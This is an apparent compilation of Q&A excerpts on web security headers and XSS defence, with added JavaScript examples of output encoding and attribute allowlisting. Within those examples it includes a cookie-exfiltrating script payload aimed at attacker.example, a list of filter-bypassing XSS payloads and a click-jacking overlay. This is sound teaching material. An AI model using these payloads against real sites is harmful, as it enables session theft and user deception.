Config your IIS server to use the “Content-Security-Policy” header

From Ian Oxley’s Sitepoint article – Improving Web Security with the Content Security Policy, it would seem that you define your Content Security Policy (and, in turn, populate those headers) directly in your IIS configuration file. The example given in the linked post, <system.webServer> <httpProtocol> <customHeaders> <add name="Content-Security-Policy" value="default-src 'self';" /> </customHeaders> </httpProtocol> </system.webServer> demonstrates …

how to set Http header X-XSS-Protection

I doubt it’d work as just a meta tag. You may have to tell your web server to send it as a real header. In PHP, you’d do it like header("X-XSS-Protection: 0"); In ASP.net: Response.AppendHeader("X-XSS-Protection", "0") In Apache’s config: Header set X-XSS-Protection 0 In IIS, there’s a section in the properties for extra headers. It often …

What is cross site scripting?

With cross-site scripting, it’s possible to infect the HTML document produced without causing the web server itself to be infected. An XSS attack uses the server as a vector to present malicious content back to a client, either instantly from the request (a reflected attack), or delayed through storage and retrieval (a stored attack). An …
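As an added example that is not part of the answer above, the two vectors it names in a few lines of Node.js: a page that echoes a query parameter back (reflected) and a comment list that renders what earlier visitors saved (stored). The attacker payload, the query object and the in-memory comment store are constructed for the demonstration; the fix shown, encoding untrusted data at the point of output, is the same for both.

```javascript
// Added example, not code from the answer above. A toy page renderer that
// shows the two XSS vectors the answer names and the output-encoding fix.
// The payload, the query object and the comment store are constructed here.

// Constructed attacker input: leaks document.cookie if the browser runs it.
const PAYLOAD =
  '<script>location="https://attacker.example/?c="+document.cookie</script>';

// Stand-in for the database a stored attack abuses.
const comments = [];

// Replace the five characters that can change meaning in HTML text or a
// quoted attribute value. Untrusted data goes through this at output time.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Reflected: the request parameter is placed into the response unchanged.
function renderGreetingUnsafe(query) {
  return `<h1>Hello, ${query.name}</h1>`;
}

// Same page with the parameter encoded; the browser shows the payload as text.
function renderGreetingSafe(query) {
  return `<h1>Hello, ${escapeHtml(query.name)}</h1>`;
}

// Stored: the comment is saved as submitted and rendered to every later visitor.
function postComment(text) {
  comments.push(text);
}

function renderCommentsUnsafe() {
  return '<ul>' + comments.map((c) => `<li>${c}</li>`).join('') + '</ul>';
}

// Encoding at render time fixes stored XSS without touching what is stored.
function renderCommentsSafe() {
  return '<ul>' + comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('') + '</ul>';
}

// True when the rendered document still carries the payload's opening tag.
function carriesLiveScript(html) {
  return html.includes('<script>');
}
```

In both paths the server only ever handles a string; it becomes code when a browser parses the response, which is why the fix belongs at the output boundary rather than in the database or the request handler.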

Best regex to catch XSS (Cross-site Scripting) attack (in Java)?

Don’t do this with regular expressions. Remember, you’re not protecting just against valid HTML; you’re protecting against the DOM that web browsers create. Browsers can be tricked into producing valid DOM from invalid HTML quite easily. For example, see this list of obfuscated XSS attacks. Are you prepared to tailor a regex to prevent this …
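As an added example (not from the answer, and written in JavaScript rather than the Java the question asks about, since the point does not depend on the language): a naive `<script>` blocklist, the slightly smarter one that usually follows it, and a constructed set of payloads a browser still acts on. The last function is the approach the answer favours instead, encoding for the output context rather than trying to recognise attacks.

```javascript
// Added example, not code from the answer above. Two blocklist regexes of the
// kind people write, run against constructed payloads a browser would execute.

// First attempt: "catch <script>".
const NAIVE_SCRIPT_RE = /<script>/;

// Second attempt after the first bypasses are found: case-insensitive,
// tolerant of attributes, plus the three event handlers the author knew.
const BETTER_SCRIPT_RE = /<script[\s>]|on(load|error|click)\s*=/i;

// Constructed payloads. Each is valid enough for a browser to act on.
const PAYLOADS = [
  '<script>alert(1)</script>',             // the case the naive regex was written for
  '<SCRIPT>alert(1)</SCRIPT>',             // case variation
  '<script/x>alert(1)</script>',           // junk before the closing bracket; browsers still run it
  '<img src=x onerror=alert(1)>',          // no <script> element at all
  '<svg onload=alert(1)>',                 // SVG event handler
  '<a href="javascript:alert(1)">x</a>',   // URL scheme, no tag or handler the regex knows
  '<body onpageshow=alert(1)>',            // an event the regex author did not list
  '<iframe src="data:text/html,<script>alert(1)</script>">', // payload wrapped in a data: URL
];

// The payloads a given blocklist lets through untouched.
function bypasses(re) {
  return PAYLOADS.filter((p) => !re.test(p));
}

// Output encoding for an HTML text node or a quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// After encoding, no payload still contains a tag delimiter or an unencoded
// quote, whatever obfuscation it used. (A javascript: or data: string placed
// in an href attribute needs a scheme allowlist on top of this; encoding only
// covers the text and quoted-attribute contexts.)
function stillDangerousAfterEncoding() {
  return PAYLOADS.map(escapeHtml).filter((p) => /[<>"']/.test(p));
}
```

Each regex revision fixes the payloads its author has seen and none of the ones they have not, which is the treadmill the answer is warning about; the encoding function does not need to know any of the payloads.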

XSS attacks and style attributes

This does not work due to a click-jacking vulnerability. Example: <a href="http://example.com/attack.html" style="display: block; z-index: 100000; opacity: 0.5; position: fixed; top: 0px; left: 0; width: 1000000px; height: 100000px; background-color: red;"> </a> Found at: http://www.bioinformatics.org/phplabware/forum/viewtopic.php?id=164 The code would be perfectly validated but it may cause serious damage. So, rule of thumb: use a very strict white list …
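As an added example that is not the answer's own code: the "very strict white list" it recommends, applied to the attributes of an `<a>` tag. The input is assumed to come from a real HTML parser as a `{tag, attrs}` object (the element from the answer is reconstructed here by hand); the policy then decides attribute by attribute, and anything not explicitly allowed, including the style attribute the overlay relies on, is dropped rather than inspected.

```javascript
// Added example, not code from the answer above. An attribute allowlist for a
// few inline tags. Input is a parsed element {tag, attrs}; the POLICY table,
// tag set and the sample elements are constructed for the demonstration.

// Allowed tags and, for each, the attributes that may survive. No 'style',
// no 'on*' handlers, no 'target': they are simply not listed.
const POLICY = {
  a: new Set(['href', 'title']),
  b: new Set(),
  i: new Set(),
};

// href may only be a same-document fragment or an absolute http(s) URL.
// Relative and protocol-relative values are rejected rather than guessed at.
function isAllowedHref(value) {
  const v = value.trim();
  if (v.startsWith('#')) return true;
  try {
    const u = new URL(v);                         // throws on relative input
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch (e) {
    return false;
  }
}

// Returns the element with only allowed attributes, or null if the tag
// itself is not in the policy.
function sanitizeElement(el) {
  const tag = el.tag.toLowerCase();
  const allowed = POLICY[tag];
  if (!allowed) return null;
  const attrs = {};
  for (const [name, value] of Object.entries(el.attrs)) {
    const n = name.toLowerCase();
    if (!allowed.has(n)) continue;                        // style, onclick, ...: dropped
    if (n === 'href' && !isAllowedHref(value)) continue;  // javascript:, data:, //host: dropped
    attrs[n] = value;
  }
  return { tag, attrs };
}

// Serialise a sanitised element back to a start tag, encoding each value
// for the quoted-attribute context.
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
function toStartTag(el) {
  const parts = Object.entries(el.attrs)
    .map(([k, v]) => ` ${k}="${String(v).replace(/[&<>"]/g, (c) => ATTR_ESCAPES[c])}"`);
  return `<${el.tag}${parts.join('')}>`;
}

// The overlay from the answer, as a parser would hand it over (constructed).
const OVERLAY = {
  tag: 'a',
  attrs: {
    href: 'http://example.com/attack.html',
    style: 'display: block; z-index: 100000; opacity: 0.5; position: fixed; ' +
           'top: 0px; left: 0; width: 1000000px; height: 100000px; background-color: red;',
  },
};
```

Dropping `style` wholesale is the point: trying to allow "harmless" CSS while blocking `position: fixed`, huge dimensions or `opacity` would just be another blocklist, with the same weaknesses as the regex approach.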
